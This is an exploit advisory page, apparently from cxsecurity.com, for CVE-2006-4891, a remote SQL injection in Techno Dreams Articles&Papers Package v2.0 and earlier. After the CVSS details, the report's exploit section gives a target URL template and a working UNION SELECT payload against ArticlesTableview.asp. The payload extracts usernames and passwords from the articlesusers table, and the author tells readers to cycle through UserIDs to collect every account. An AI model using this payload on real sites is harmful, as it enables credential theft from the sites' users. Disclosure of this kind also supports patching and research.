Bug: Techno Dreams Articles&Papers Package <=v2.0(ArticlesTableview.asp) Remote SQL Injection Vulnerability ( Ascii Version )

Search:
WLB2

Techno Dreams Articles&Papers Package <=v2.0(ArticlesTableview.asp) Remote SQL Injection Vulnerability

Published
Credit
Risk
2006.09.22
ajann
Medium
CWE
CVE
Local
Remote
CWE-89
CVE-2006-4891
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

Vulnerability Report

************************************************************************
*******

# Title : Techno Dreams Articles&Papers Package <=v2.0(ArticlesTableview.asp) Remote SQL Injection
Vulnerability

# Author : ajann

# Script Page : http://www.t-dreams.com

# Exploit;

************************************************************************
*******

###http://[target]/[path]/ArticlesTableview.asp?key='[SQL HERE]

Example: ArticlesTableview.asp?key=-1%20union%20select%200,0,0,0,userpassword,use
rname,0,0,0,0,0,0,0,0%20from%20articlesusers%20where%20userid=18

Pls UserID Change(1,2,3,4,5.....)

# ajann,Turkey

# ...

# Im not Hacker!

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version